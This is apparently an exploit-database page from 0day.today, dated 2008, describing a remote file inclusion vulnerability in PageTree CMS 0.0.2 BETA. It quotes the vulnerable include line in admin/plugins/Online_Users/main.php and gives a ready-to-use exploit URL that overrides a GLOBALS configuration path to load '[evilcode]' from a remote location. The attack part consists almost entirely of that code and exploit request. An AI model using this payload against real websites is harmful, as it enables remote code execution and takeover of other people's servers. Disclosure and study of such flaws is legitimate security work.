[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PageTree CMS 0.0.2 BETA 0001 Remote File Inclusion Vulnerability

Author
NoGe
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4280
Category
web applications
Date add
27-11-2008
Platform
unsorted
================================================================
PageTree CMS 0.0.2 BETA 0001 Remote File Inclusion Vulnerability
================================================================


=============================================================================================================


  [o] PageTree CMS 0.0.2 BETA 0001 Remote File Inclusion Vulnerability

       Software : PageTree CMS version 0.0.2 BETA 0001
       Vendor   : http://pagetreecms.co.cc/
       Download : http://pagetree.googlecode.com/svn/trunk/
       Author   : NoGe

=============================================================================================================


  [o] Vulnerable file

       admin/plugins/Online_Users/main.php

        include($GLOBALS['PT_Config']['dir']['data']."content/1.php");



  [o] Exploit

       http://localhost/[path]/admin/plugins/Online_Users/main.php?GLOBALS[PT_Config][dir][data]=[evilcode]


=============================================================================================================




#  0day.today [2024-09-28]  #